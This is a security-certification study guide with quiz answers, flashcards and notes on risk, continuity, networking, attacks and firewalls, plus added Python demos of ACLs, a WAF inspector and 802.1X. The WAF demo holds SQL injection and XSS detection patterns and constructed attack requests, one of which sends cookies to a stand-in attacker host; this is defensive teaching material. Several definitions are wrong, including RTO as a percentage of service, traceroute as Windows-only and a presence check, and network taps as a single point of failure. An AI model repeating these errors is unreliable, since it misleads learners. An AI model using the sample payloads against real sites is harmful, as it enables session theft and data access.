Ethics, Security & Cloud Access: Review Questions
58 Questions

Questions and Answers

Which of the following parties is generally permitted to file a complaint related to violations of a code of ethics?

  • Any professional in a related field, regardless of direct impact.
  • Only employers or clients directly affected by the actions in question. (correct)
  • Only government regulatory bodies.
  • Any member of the public who witnesses a potential violation.

Witnessing a violation of a Code of Ethics is optional to report.

False (B)

What type of attack involves an attacker overwhelming a system with traffic to prevent legitimate users from accessing it?

Denial of Service (DoS)

Building systems with built-in ________ helps protect against service outages by ensuring that another component can take over if one fails.

redundancy

What is the primary risk associated with failing to adhere to software license agreements?

Fines and legal actions. (A)

Using passwords combined with security questions is a valid form of multi-factor authentication.

False (B)

What does protecting data 'entrusted to the organization' primarily refer to?

Protecting client's or user's data. (C)

________ are defined as methods used by attackers to reach their target.

Threat Vectors

A company is considering using a cloud-based service but is concerned about security. What is the primary function of a Cloud Access Security Broker (CASB) in this scenario?

To intercept and monitor traffic between the user and the cloud service for security issues. (A)

A Statement of Work (SOW) takes precedence over a Master Service Agreement (MSA) in the event of conflicting terms.

False (B)

Why is it critical that a one-way hash function produces a unique, fixed-length output, and what security concern arises if this is not the case?

Compromised data integrity; collisions

Creating and verifying a Message Authentication Code (MAC) involves using a secret key in conjunction with a(n) ________ function to ensure data integrity and authenticity.

hash

Match the following security concepts with their descriptions:

  • Vendor Lock-In = The difficulty of switching to a different vendor due to proprietary technologies or high switching costs.
  • Asymmetric Encryption = Encryption and decryption using a public and private key pair.
  • Social Engineering = Manipulating individuals into divulging confidential information or performing actions detrimental to security.
  • Artificial Intelligence in Security = Utilizing AI to analyze large volumes of security data and automate threat detection.

What is the term for the level of risk present before any control measures are implemented?

Inherent Risk (D)

A newly introduced risk from a control measure should be considered when assessing overall risk.

True (A)

What are procedures and mechanisms that reduce the likelihood or impact of a risk called?

Controls

The risk that remains after controls have been applied is known as ______ risk.

residual

Match the following control purposes with their correct descriptions:

  • Preventative = Intended to avoid an incident from occurring
  • Detective = Used to identify incidents in progress
  • Corrective = Remedies circumstances to mitigate damage

Which of the following is an example of a detective control mechanism?

Intrusion Detection System (A)

Version control is used to manage configurations but is not helpful for identifying unauthorized changes.

False (B)

What type of documentation can be created to help others visually understand system settings?

Diagrams

A(n) ______ is the default configuration settings set by an organization for a system.

baseline

What is the name of the set of controls designed to keep a business running in the face of adversity?

Business Continuity Plan (B)

Redundancy is a protection against the failure of multiple components.

False (B)

What analysis helps identify and remove single points of failure from a system?

SPOF analysis

An organization's legal team should always be involved to ensure compliance with laws and obligations with ______.

3rd parties

What is the purpose of a Security Information and Event Management (SIEM) system?

To collect system security information, analyze it, and retain it for future use (C)

Disaster recovery sites are solely for technology operations and do not serve as offsite storage locations.

False (B)

Which of the following describes an action performed during a parallel test of a Disaster Recovery Plan?

Activating the Disaster Recovery Environment. (A)

Security at a remote disaster recovery facility is less important than security at the primary data center.

False (B)

What design approach provides principles for designing crime prevention mechanisms that are appropriate to the surrounding environment?

Crime Prevention Through Environmental Design (CPTED)

The principle that requires agreement of two persons before access to very sensitive functions is granted is known as ______.

two-person control

Which of the following refers to employees rotating job functions for the purpose of diversity and integrity in work?

Job rotation (C)

Role-based access control (RBAC) issues arise when users switch roles, and their previous role's system access is automatically revoked.

False (B)

What is the practice where auditors review documentation to ensure that managers have formally approved each user's account and access permissions called?

Access review

During the off-boarding process, administrators should first ______ accounts before permanent removal to allow reversal if needed.

deactivate

What security benefit does limiting an employee's system access provide?

Protecting against internal risks. (C)

A Local Area Network (LAN) can only connect computers within a single building.

False (B)

What is the primary purpose of technologies like Bluetooth?

To create a wireless connection between a computer and its peripheral devices

Protocols like TCP/IP rely on a set of ______ rules that allow computers to communicate on a network.

standardized

Why is User Datagram Protocol (UDP) well-suited to video and voice applications?

Every single packet doesn't have to reach the destination for video and voice to be comprehensible. (A)

Network ports uniquely identify a system, while an IP address uniquely identifies a location on a system associated with a specific application.

False (B)

What type of attack relies on a compromised communication path between a client and a server?

Eavesdropping attack

In a Man-in-the-Middle attack, what is the attacker's primary role?

To act as a relay, viewing and potentially altering communications. (B)

A replay attack involves generating completely new authentication tokens to gain unauthorized access.

False (B)

What type of attack involves exploiting vulnerabilities to cause systems to fail to encrypt data properly, potentially using methods like high-voltage electricity?

Fault Attack

Attackers use __________ to monitor system activity and retrieve information that is actively being encrypted.

footprints

What is the primary goal of measuring the time taken for cryptographic operations in a side-channel attack?

To gain information about the cryptographic process that may be used to undermine security. (D)

An Intrusion Detection System (IDS) or Intrusion Prevention System (IPS) always accurately identifies and prevents all attacks.

False (B)

Why can an Intrusion Detection System (IDS) be considered a single point of failure?

It may disrupt the entire network

A vulnerability scanner maintains a __________ for all known vulnerability exploits to test servers for weaknesses.

database

How do firewalls primarily protect networks?

By dividing networks into security zones. (C)

In a Zero Trust approach, systems are automatically trusted based on their location within the internal network.

False (B)

What is the function of switches in a network?

Central aggregation point for network traffic

What is the purpose of Access Control Lists (ACLs) on network devices?

To limit traffic entering or leaving a network. (A)

A default-deny firewall blocks all traffic unless explicitly allowed by a rule.

True (A)

What is a key feature of Next-Generation Firewalls (NGFWs) that distinguishes them from traditional firewalls?

They evaluate requests based on user identity and application type. (C)

What is the main purpose of using a Virtual Private Network (VPN)?

Create a virtual tunnel between two systems over the internet

Flashcards

Who can file a complaint?

Only employers and clients can file a complaint, or other professionals depending on the complaint.

Reporting Ethics Violations

You are obligated to report any observed violations of the Code of Ethics.

Social Engineering

An attacker uses psychological manipulation to trick employees into divulging information or access.

Denial of Service (DoS)

Overwhelming a system with traffic to prevent legitimate users from accessing it.

System Redundancy

Building systems with redundancy so if one component fails, another takes over.

Passwords + Security Questions

Passwords combined with security questions are NOT multi-factor authentication.

Data Protection

Protecting data that was entrusted to the organization, such as client data.

Threat Vectors

Methods used by attackers to reach their targets, such as social engineering or hacker toolkits.

Cloud Access Security Broker (CASB)

Acts as an intermediary, monitoring traffic between users and cloud services for security issues.

Service Level Agreement (SLA)

Details specific performance expectations a customer has for a vendor's service.

Master Service Agreement (MSA)

Governs terms for additional projects outlined in Statements of Work (SOW).

Hash Function

Transforms variable-length input into a unique, fixed-length output; should be collision-resistant.

Inherent Risk

Risk level before implementing controls.

Residual Risk

Remaining risk after controls are applied.

Introduced Risk

New risk introduced by implemented controls.

Controls

Procedures/mechanisms reducing risk likelihood or impact.

Business Continuity Planning (BCP)

Ensuring business continues during disruptions.

Minimum Service Level

Minimum acceptable service level during a disaster.

Data Backup

Copying data from primary to secondary storage.

Full + Differential Backup Restore

Full backups every Sunday, differential backups weekdays. Restore Sunday full, then latest weekday differential.

Full + Incremental Backup Restore

Full backups every Sunday, incremental backups weekdays. Restore Sunday full, then all incremental backups in order.

Disaster Recovery Site

Secondary location for IT operations during a disaster.

Business Continuity Controls

Controls that keep a business running during adversity.

Security Controls

Controls that keep systems secure.

Redundancy

Protecting against failure of a single component.

Single Point Of Failure (SPOF)

Analyzing for systems with a single-point-of-failure.

Security Information and Event Management (SIEM)

System gathering & analyzing security data for incidents.

Backup Transportation

Physically transporting backups to a recovery site, manually or electronically.

Parallel Test

A live test where the disaster recovery environment runs in parallel with the production environment.

Crime Prevention Through Environmental Design (CPTED)

Designing crime prevention mechanisms that are appropriate for the surrounding environment.

Dual Control

Requires two people to agree before a sensitive action can be performed.

Job Rotation

Rotating employees' responsibilities for diversity and integrity.

Privilege Creep

When users retain access rights from previous roles, violating least privilege.

User Account Management

Creating, updating, and deleting user accounts across applications and systems.

Account Deactivation

Disabling an account before permanent removal, allowing for easy reversal if needed.

Network Address Translation (NAT)

Converting private IP addresses to public IP addresses for internet communication.

Network Protocol

Standardized rules allowing computers to communicate on a network.

Encryption

Hiding the true content of network traffic from unauthorized parties.

Ping

Verifying if a system is present and responding on a network.

Malware

Software that performs unwanted actions once executed.

Botnets

Networks of compromised computers controlled by attackers.

Man-in-the-Middle Attack

An attack where the attacker intercepts communication between two parties.

Replay Attack

Replaying captured network data, like authentication tokens, to gain unauthorized access.

Fault Injection Attack

Causing system failures through methods like high voltage to bypass security measures.

Footprinting Attack

Monitoring system activity to extract information from encrypted data.

Timing Attack

Analyzing the time it takes for cryptographic operations to complete to gain information used to compromise security.

False Positive (IDS/IPS)

Alert triggered when no attack occurred.

False Negative (IDS/IPS)

Failure to alert when an attack is actually taking place.

Next-Generation Firewall (NGFW)

Inspects network traffic, identifies applications, and blocks threats. Performs deep packet inspection.

Firewall Security Zones

Divides networks into security zones with different levels of trust.

Zero Trust Approach

Trusting no device or user by default, regardless of network location.

DMZ (Demilitarized Zone)

Special network segments that are accessible by outside parties.

VLAN Trunking

Allows switches in different locations on the network to carry the same VLANs.

VPN (Virtual Private Network)

A dedicated encrypted network connection built on top of a public network like the Internet.

Network Access Control (NAC)

Verifies system and user authorization before network access is granted.

Cloud Computing

Delivering computing resources over a network, allowing on-demand access to shared resources.

Study Notes

  • Only employers and clients can file a complaint due to the code's nature.
  • Professionals may file a complaint based on its nature.
  • Witnessing a Code of Ethics violation requires reporting.

Social Engineering

  • Attackers use psychological manipulation to get employees to reveal information or grant access.
  • Attackers intercept network traffic during logins and assume user roles.

Denial of Service (DoS) Attacks

  • A system is bombarded with traffic, overwhelming its ability to respond to legitimate users.
  • Firewalls can block unauthorized connections to protect against DoS attacks.
  • Redundancy in systems ensures component failure doesn't cause a complete outage.

Service Outages

  • Programming errors, equipment failure, etc., can cause service outages.
  • Resilient systems that withstand errors and hardware failures protect against these outages.

Passwords

  • Previously used passwords should not be reused.
  • Organizations should facilitate easy password changes, but be wary of reset processes that attackers could exploit.
  • Passwords combined with security questions do not constitute multi-factor authentication; both are "something you know."

Data Protection

  • Educate users on protecting personal information.
  • Protect data entrusted to the organization (e.g., client data).
  • Personal information: any info that can be tied back to a specific individual.

Privacy

  • Laws governing information protection depend on reasonable expectation of privacy.
  • Uploading a YouTube video means you do not have an expectation of privacy.

Security Controls

  • Build controls to reduce the likelihood of successful attacks (e.g., multi-factor authentication, social engineering awareness).
  • Altered, deleted, or stolen information can significantly damage organizations and customers.
  • Software license agreement violations risk fines and legal action.

Threat Vectors

  • Threat Vectors are methods attackers use to reach targets (e.g., social engineering, hacker toolkits).

Risk Transfer

  • Attempting to shift the impact of risk from your organization to another.
  • You cannot always transfer the risk completely (e.g., reputation damage remains with the organization).

Risk Assessment

  • Inherent risk is the initial risk level before controls.
  • Residual risk is the risk remaining after controls are applied.
  • Controls can introduce new risks; for example, a firewall mitigates inherent risk but introduces the risk of firewall failure.

Security Controls (Mechanisms and Purpose)

  • Controls are procedures that reduce risk likelihood or impact and help identify issues.
  • First you must group Controls by their purpose:
  • Preventative - Designed to prevent an incident from occurring
  • Detective - Designed to detect incidents in progress
  • Corrective - Designed to put systems back to normal after an incident has occurred
  • Then group them by their Control Mechanism:
  • Technical - Achieved through technology (ex: firewall)
  • Administrative - Achieved through procedures (ex: background checks, incident response)
  • Physical - Achieved through tangible items (ex: security guards, fire suppression system)

Configuration Management

  • Tracks OS settings and installed software inventory.
  • Artifacts (diagrams, legends) help understand system configuration.
  • Snapshots assess if settings are outside approved change management processes.

Secure Baseline

  • The secure baseline is an organization's default configuration setting.

Version Control

  • Assigning an incrementing version number to each software release for identification.
  • Version numbers are written as three-part decimals.
  • Understanding how domestic and international laws apply to an organization is crucial.

Password Policies

  • Password policies officially document password requirements (length, complexity).

Business Continuity Planning (BCP)

  • BCP is a set of controls to keep a business running during adversity.
  • BCP involves identifying mission-essential functions and the IT systems supporting them.
  • Cloud BCP requires collaboration between providers and customers.

Redundancy

  • Refers to the level of protection against failure of a single component.
  • SPOF (Single Point of Failure) analysis identifies and removes single points of failure.
  • SPOF analysis can apply to IT infrastructure, HR management, and vendor reliance.

Fault Tolerance

  • Multiple systems protect against service failure (beyond just availability zones).
  • Uninterruptible Power Supplies (UPS) provide battery power during outages, sometimes supplemented by a generator.
  • Power Distribution Units (PDUs) provide power cleaning and management.
  • Redundant Array of Inexpensive Disks (RAID) protects against storage device failure.
  • Parity blocks in RAID regenerate failed disk content.
  • Fault-tolerance mechanisms prevent system failure even with component failures.

Incident Response Communication

  • Minimize external communications (media, etc.).
  • Decide whether to involve law enforcement, considering potential release of sensitive details.
  • Always involve the organization's legal team for compliance.
  • Describe how information will be shared within the organization.

SIEM (Security Information and Event Management)

  • SIEM collects data from diverse sources, analyzes it for security incidents, and retains it.

External Risk Detection

  • External sources (customers) may detect risks before internal systems.
  • Incident Response (IR) teams need a consistent method for receiving and evaluating external reports.

Incident Response Phases

  • First responders have responsibilities to reduce risk.
  • Assessment Mode: Triage/analyze damage and implement permanent recovery.
  • Temporary Recovery may precede Permanent Recovery.

Recovery Time Objective (RTO)

  • Specifies the percentage of service that must be available during a disaster.

Backups

  • Backups provide a fail-safe way to recover data.

Backup Types

  • Tape backups periodically copy data to tape cartridges.
  • Disk backups write data to special backup disks.
  • Backups to Storage Area Networks (SAN) or Network Attached Storage (NAS) also fit in this category.

Backup Restoration Examples

  • Full backup Sunday, differential backups weekdays, failure Friday: restore Sunday full and Thursday differential.
  • Full backup Sunday, incremental backups weekdays, failure Friday: restore Sunday full and all incremental backups.

Disaster Recovery Sites

  • Used to restore operations eventually, but this requires a significant amount of time.
  • Disaster recovery sites provide facilities for technology operations and offsite storage.
  • Mobile disaster recovery, called "Wheels", allows backups to be physically transported to the disaster recovery facility either manually or electronically.

Disaster Recovery Testing

  • A change of an organization's business protocols to match the current Disaster Recovery Plan.
  • Tabletop Exercise: asks each team member to review their role in the disaster recovery process and provide feedback.
  • Walkthrough: gathers the team together for a formal review of the disaster recovery plan.
  • Parallel Test: activates the Disaster Recovery Environment.

Perimeter Security

  • Remote locations of data centers require as much security as the centers themselves.
  • Sensitive areas must be physically protected, since physical access offers an opening to digital eavesdroppers and network intruders.
  • Crime Prevention Through Environmental Design (CPTED) principles design crime prevention mechanisms based on surroundings.

Environmental Design

  • Security design should allow for observation of the facility's natural surroundings.
  • Clearly mark areas closed to the public.

Dual Control

  • Dual control requires two people to authorize sensitive functions.

Job Rotation

  • Job rotation involves rotating job functions for diversity and integrity.

Role-Based Access Control

  • Ensures employees moving to different roles have appropriate access.

Access Creep

  • Wrong permissions are assigned, resulting in too little access for users to do their job or too much access (violating least privilege).
  • Occurs when users switch roles and their previous role's access is not revoked.

Account Reviews

  • Auditors check documentation to ensure managers approved user accounts and access permissions.
  • Account management involves creating, updating, and deleting user accounts.
  • Deactivate the account first before permanent removal, as deactivation can be reversed.
  • During off-boarding, administrators disable accounts and revoke authorizations.

Principle of Least Privilege

  • Protects against internal and external risks by limiting the potential damage to what the stolen privileges allow.

Local Area Networks (LAN)

  • Can connect computers within an office (LAN) or to the global internet.
  • Connection is made by plugging a physical Ethernet cable into a network jack in the wall.

Wireless Communication

  • Wireless communication creates a wireless connection between computers and peripheral devices.

Protocols

  • A set of standardized rules that allow computers to communicate on a network such as the internet.

User Datagram Protocol (UDP)

  • Systems send packets to each other blindly, with no guaranteed delivery.
  • Not every packet is required to reach the destination for voice or video.

Internet Protocol (IP)

  • Allows traffic delivery between any two systems using an addressing scheme.
  • IP addresses uniquely identify a system, while network ports uniquely identify a particular location on the system associated with a specific application.

DNS (Domain Name System)

  • Ensures everyone knows how to find common services.

Encryption

  • Hides the true content of network traffic from those without the decryption key.

Ephemeral Key

  • Changes the encryption key for each packet, preventing attackers from monitoring traffic over a long period of time.

Simultaneous Authentication of Equals (SAE)

  • A secure key exchange protocol based on the Diffie-Hellman technique, providing a more secure initial setup of encrypted wireless communications.

Ping Tests

  • If the remote system responds to a ping, your internet connection is working, so the issue lies with the web server or its network connection rather than with your own network.
  • If you ping many systems on the internet and get no response, the problem is likely on your end.
  • Next, ping a system on your local network: if it responds, there is probably an issue with your network's connection to the internet.
  • If a local network system does not respond, either your local network is down or there is a problem with your computer.
  • Last resort: repeat the process on another computer.

Traceroute

  • Allows you to interrogate a system to see if it is present on the network.
  • Shows how packets are traveling today from your system (e.g., located in Toronto) to a web server such as LinkedIn.com, wherever that is located.
  • Works only on Windows.

Malware

  • Might steal information, damage data, or disrupt normal use of the system.
  • Opening email attachments, clicking links, or inserting an infected USB can spread malware.

Worms

  • When a worm infects a system, it uses it as its base for spreading to other parts of the Local Area Network.
  • Worms spread because the systems are vulnerable.

Trojan Horse

  • When you run the software, it may perform as expected; however, it also has an unexpected/malicious function.

Application Controls

  • Limit the software that can run on a system to specific titles and versions.

Botnets

  • Once malware takes control of a system (the hacker gains control), he or she adds it to the existing botnet.
  • Hackers command botnets through Command and Control networks, which relay their orders.
  • High redundancy is needed because security analysts will shut them down one by one.
  • In a cat-and-mouse game, whoever controls the Command and Control channels retains control of the botnet for the longest.

Eavesdropping Attacks

  • Rely on a compromised communication path between a client and a server.

Man-In-The-Middle Attacks (MITM)

  • Hackers may use the Man-in-the-Middle technique to trick the user into connecting to the attacker directly; the attacker then connects directly to the server.
  • The original user logs into the attacker's fake server while the attacker relays communication.
  • The user is unaware of the attacker intercepting communications.
  • Exploits flaws in browsers and browser plugins to gain access to web communications.
  • If the attacker is able to control the network traffic, they may be able to conduct a Replay Attack.

Replay Attack

  • Uses previously captured data, such as an encrypted authentication token, to create a separate connection to the server.

Side-Channel Attacks

  • A hacker exploits a vulnerability to view a user's encrypted web communication.
  • High-voltage electricity can cause malfunctions that undermine security.
  • Such failures may cause systems to fail to encrypt data properly.
  • Attackers use footprints to monitor system activity and retrieve information that is actively being encrypted.
  • An attacker captures electromagnetic radiation from a cryptographic system to determine plaintext information.
  • Attackers precisely measure how long cryptographic operations take to complete, gaining information that may be used to undermine security.

IDS/IPS Systems (False positives)

  • Triggers an alert when an attack did not actually take place.

IDS/IPS Systems (False negatives)

  • Fails to trigger an alert when an actual attack occurs.

Network Taps

  • Risk: it is a single point of failure, so it may disrupt the entire network.
  • It is a listening platform that receives copies of all traffic sent through the network for scanning.
  • Cannot detect an attack in advance, as it only becomes aware of traffic once it enters the network.

Advanced Malware Protection

  • Builds on port scanning mechanisms
  • Scans deeper than a port scanner: it identifies which services (and versions) are actually running on those ports
  • Has a database of known vulnerabilities and exploits and tests the server to see if it is affected by any of them (these bullets describe a vulnerability scanner rather than endpoint anti-malware)

Fire Suppression Systems

  • Wet-pipe systems contain water in the pipes ready to deploy when a fire strikes; dry-pipe systems fill only after a detector triggers, which reduces the risk of accidental water damage to equipment

Network Segmentation

  • Firewalls divide networks into security zones to separate systems with differing security levels
  • Systems that accept outside connections (mail, web servers) are placed in their own zone, away from internal systems
  • Zero Trust Approach : Systems do not gain any trust based solely upon their network location

DMZ (Demilitarized Zone)

  • Network segment between the internet and the internal network that hosts systems accepting outside connections (web, mail servers), so that a compromise there does not give direct access to internal systems
  • Special intranet segments accessible by outside parties like business partners are called extranets

Switches

  • Reside in wiring closets and connect the computers in a building together
  • Ethernet jacks are at the other end of network cables connected to switches

Routers

  • Serve as a central aggregation point for network traffic heading to or from a large network
  • Make best-path decisions for traffic to follow

Access Control Lists (ACLs)

  • Used to limit traffic entering or leaving a network. This type of filtering judges each packet on its own header fields and pays no attention to connection state, so a device filtering this way (typically a router with ACLs) is called a stateless firewall, as opposed to a stateful firewall that tracks connections.

Virtual LANs (VLAN)

  • Users on the same VLAN can directly contact each other as if they were connected to the same switch
  • Reduce security risk by limiting communication between unrelated systems.
  • Trunking carries multiple VLANs over a single link, so switches in different locations can carry the same VLANs

Implicit Deny Rule

  • If the firewall receives traffic not explicitly allowed by a firewall rule, then that traffic must be blocked
  • Basically: if you don't have a passcard, you cannot get in, because the door is closed by default
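The Access Control List and Implicit Deny bullets above describe the same rule engine from two angles. The block below is an added example, not part of the study notes: a small stateless filter (the router ACL) next to a stateful firewall that uses the same rule syntax, both ending in implicit deny, run over constructed packets. It also shows the hole you have to open in a stateless ACL to let HTTPS replies back in, and why a stateful device does not need it. All addresses, ports, rules and function names are assumptions made for the demonstration.

```python
# Added example (not from the study notes): stateless ACL versus stateful
# firewall, both falling through to implicit deny.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str                   # "allow" or "deny"
    src: str                      # CIDR the source address must fall in
    dst: str                      # CIDR the destination address must fall in
    sport: Optional[int] = None   # None means any port
    dport: Optional[int] = None

    def matches(self, p: Packet) -> bool:
        return (ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and (self.sport is None or self.sport == p.sport)
                and (self.dport is None or self.dport == p.dport))


def stateless_filter(rules, p: Packet) -> str:
    """Router-style ACL: every packet is judged on its own header fields.
    First matching rule wins; no match means implicit deny."""
    for r in rules:
        if r.matches(p):
            return r.action
    return "deny"


class StatefulFirewall:
    """Same rule syntax, but remembers the connections it has allowed and
    admits their replies without a dedicated rule."""

    def __init__(self, rules):
        self.rules = rules
        self.connections = set()   # (src, sport, dst, dport) of allowed flows

    def filter(self, p: Packet) -> str:
        if (p.dst, p.dport, p.src, p.sport) in self.connections:
            return "allow"         # reply to a tracked connection
        for r in self.rules:
            if r.matches(p):
                if r.action == "allow":
                    self.connections.add((p.src, p.sport, p.dst, p.dport))
                return r.action
        return "deny"              # implicit deny


INTERNAL = "10.0.0.0/8"                                  # constructed address plan
OUTBOUND_HTTPS = Rule("allow", INTERNAL, "0.0.0.0/0", dport=443)
# The only way a stateless ACL can admit HTTPS replies is a rule keyed on the
# source port, and that also admits anything an attacker sends from port 443.
STATELESS_REPLY_HOLE = Rule("allow", "0.0.0.0/0", INTERNAL, sport=443)

# Constructed sample packets (documentation address ranges).
request = Packet("10.1.2.3", 51000, "203.0.113.10", 443)        # user opens HTTPS
reply = Packet("203.0.113.10", 443, "10.1.2.3", 51000)          # server answers
unsolicited = Packet("198.51.100.7", 443, "10.1.2.3", 22)       # attacker picks sport 443
ssh_probe = Packet("198.51.100.7", 40000, "10.1.2.3", 22)       # plain inbound probe
SAMPLE = (request, reply, unsolicited, ssh_probe)


def compare_filters():
    """Run the same packets through three policies and return the verdicts."""
    strict_acl = [OUTBOUND_HTTPS]
    leaky_acl = [OUTBOUND_HTTPS, STATELESS_REPLY_HOLE]
    fw = StatefulFirewall([OUTBOUND_HTTPS])
    return {
        "strict_acl": [stateless_filter(strict_acl, p) for p in SAMPLE],
        "leaky_acl": [stateless_filter(leaky_acl, p) for p in SAMPLE],
        "stateful": [fw.filter(p) for p in SAMPLE],
    }
```

The strict ACL blocks the legitimate reply, the leaky ACL lets the attacker in on the strength of a source port, and the stateful firewall gets both right with a single rule; everything that matched no rule was dropped by the implicit deny at the end of each list.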

Next-Generation Firewalls (NGFW)

  • The newest type of firewall is the Next-Generation Firewall (NGFW)
  • Evaluates requests based on the identity of the user, the nature of the application, the time of day, etc., not just addresses and ports

Web Application Firewalls (WAF)

  • Understands how the HTTP protocol works and dives deep into application connections, looking for signs of SQL injection, cross-site scripting, and other web application attacks
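The WAF bullet above is what "dives deep into application connections" means in practice. The block below is an added example, not part of the study notes: a minimal WAF-style inspector that parses a raw HTTP request, decodes query and form parameters the way the application would (including a second decode to catch double-encoding), and matches them against a handful of SQL injection and cross-site scripting signatures. The signatures and sample requests are constructed and illustrative; the function names are assumptions for the demonstration, and a production WAF uses far larger rule sets and also inspects headers, cookies and JSON bodies.

```python
# Added example (not from the study notes): a minimal WAF-style request
# inspector with constructed signatures and sample requests.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SQLI_SIGNATURES = [re.compile(p, re.I | re.S) for p in (
    r"'\s*(or|and)\s+'?\w+'?\s*=\s*'?\w+",        # ' OR '1'='1
    r"\bunion\s+(all\s+)?select\b",                # UNION SELECT
    r";\s*(drop|delete|update|insert)\b",          # stacked query
    r"--\s*$",                                     # trailing comment
)]
XSS_SIGNATURES = [re.compile(p, re.I | re.S) for p in (
    r"<\s*script\b",
    r"<\s*(img|svg|iframe)\b[^>]*>",
    r"\bon\w+\s*=",                                # onerror=, onload=, ...
    r"javascript\s*:",
)]


def parse_request(raw: str):
    """Return (method, path, [(name, value), ...]) with query and form
    parameters decoded once, as the application would see them. Only
    application/x-www-form-urlencoded bodies are handled here."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if (method == "POST"
            and headers.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        params += parse_qsl(body, keep_blank_values=True)
    return method, parts.path, params


def inspect(raw: str):
    """Return a list of (attack_type, parameter_name) findings."""
    findings = []
    _method, _path, params = parse_request(raw)
    for name, value in params:
        value = unquote(value)   # parse_qsl decoded once; undo double-encoding too
        if any(sig.search(value) for sig in SQLI_SIGNATURES):
            findings.append(("sqli", name))
        if any(sig.search(value) for sig in XSS_SIGNATURES):
            findings.append(("xss", name))
    return findings


# Constructed sample requests.
BENIGN = "GET /search?q=hello+world&page=2 HTTP/1.1\r\nHost: shop.example\r\n\r\n"
SQLI_GET = ("GET /item?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1\r\n"
            "Host: shop.example\r\n\r\n")
XSS_POST = ("POST /comment HTTP/1.1\r\nHost: shop.example\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
            "user=bob&text=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example"
            "%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E")
DOUBLE_ENCODED = ("GET /item?id=1%2527%2520UNION%2520SELECT%2520user%252Cpass"
                  "%2520FROM%2520users HTTP/1.1\r\nHost: shop.example\r\n\r\n")
```

The double-encoded request is the case worth noticing: a filter that matches on the raw URL sees only `%2527` and passes it, while the application decodes it to a quote; inspecting after the same decoding the application performs is what separates a WAF from a string match on the wire.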

Virtual Private Networks (VPN)

  • Works by using encryption to create a virtual tunnel between two systems over the internet
  • Everything entering the tunnel is encrypted and is decrypted when it exits

Full Tunnel

  • All network traffic leaving the connected device is routed through the VPN tunnel, regardless of final destination

Split Tunnel

  • Only traffic destined for the corporate network is sent through the VPN tunnel

Network Access Control (NAC)

  • Intercepts network traffic coming from unknown devices and verifies that the system and users are authorized before allowing further communication

802.1x Authentication Flow

  • Supplicant (sends credentials) → Authenticator (receives them and passes them to the Authentication Server) → Authentication Server (authenticates and sends the result to the Authenticator) → Authenticator (applies the result) → Supplicant → Access
  • Once the Authenticator learns the identity of the requesting user, it places the user in the network (e.g. a VLAN) based upon that identity
  • A device that fails authentication or posture assessment is placed into a quarantine VLAN with limited internet access and no access to internal resources

Posture Assessment

  • Is done through an agent installed on the device, or agentless (the device is checked over the network without installed software)
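The 802.1X flow and posture assessment bullets above describe one exchange, so here is the whole thing as a simulated round trip. This is an added example, not part of the study notes: a supplicant's credentials and posture report pass through an authenticator (the switch port, which never holds the user database) to an authentication server that answers with a VLAN assignment, quarantining devices that fail the posture rule. The user database, VLAN numbers, posture rule and class names are assumptions made for the demonstration; a real deployment runs EAP over the wire and RADIUS between switch and server.

```python
# Added example (not from the study notes): simulated 802.1X / NAC exchange
# with posture assessment deciding between the user's VLAN and quarantine.
import hashlib
import hmac
import os

QUARANTINE_VLAN = 999     # constructed VLAN number


def _pw_hash(password: str, salt: bytes) -> bytes:
    # Salted PBKDF2 stands in for whatever store the real server uses.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class AuthenticationServer:
    """Stands in for the RADIUS server: verifies the credential, applies
    the posture rule and returns an Access-Accept / Access-Reject style
    decision carrying the VLAN the port should be placed in."""

    def __init__(self, users, posture_rule):
        self.users = users                  # username -> {salt, hash, vlan}
        self.posture_rule = posture_rule    # callable(posture_report) -> bool

    def authenticate(self, username, password, posture):
        rec = self.users.get(username)
        if rec is None or not hmac.compare_digest(rec["hash"], _pw_hash(password, rec["salt"])):
            return {"result": "reject"}
        if not self.posture_rule(posture):
            return {"result": "accept", "vlan": QUARANTINE_VLAN, "reason": "posture"}
        return {"result": "accept", "vlan": rec["vlan"]}


class Authenticator:
    """The switch: relays the supplicant's data to the server and applies
    the answer to the port. It never sees the user database."""

    def __init__(self, server):
        self.server = server
        self.port_vlan = {}

    def handle(self, port, username, password, posture):
        decision = self.server.authenticate(username, password, posture)
        if decision["result"] == "reject":
            self.port_vlan[port] = None     # port stays unauthorised
            return "blocked"
        self.port_vlan[port] = decision["vlan"]
        return decision["vlan"]


def build_demo():
    salt = os.urandom(16)
    users = {"alice": {"salt": salt, "hash": _pw_hash("correct horse", salt), "vlan": 10}}

    def posture_ok(report):
        return bool(report.get("av_enabled")) and bool(report.get("patched"))

    return Authenticator(AuthenticationServer(users, posture_ok))


def demo():
    """Three supplicants on three ports: healthy, unpatched, wrong password."""
    auth = build_demo()
    return {
        "healthy": auth.handle(1, "alice", "correct horse", {"av_enabled": True, "patched": True}),
        "unpatched": auth.handle(2, "alice", "correct horse", {"av_enabled": True, "patched": False}),
        "bad_password": auth.handle(3, "alice", "wrong", {"av_enabled": True, "patched": True}),
    }
```

Note that a valid credential with a failed posture check still gets an accept, just into the quarantine VLAN; that is the agent/agentless posture step from the notes expressed as a server decision rather than a port-level block.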

Cloud Access Security Broker (CASB)

  • Intercepts traffic between users and cloud services so that security policy can be monitored and enforced (see Cloud Security Broker below)
  • Contrast with compromised devices that connect back to cloud services for command and control, creating a pathway for external attackers: such devices should be isolated in a network segment where they have no access to trusted networks

Cloud Computing

  • Delivering computing resources to a remote customer over a network
  • A model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction
  • No cloud model is inherently superior to other approaches. It all depends on context

Cloud Security Broker

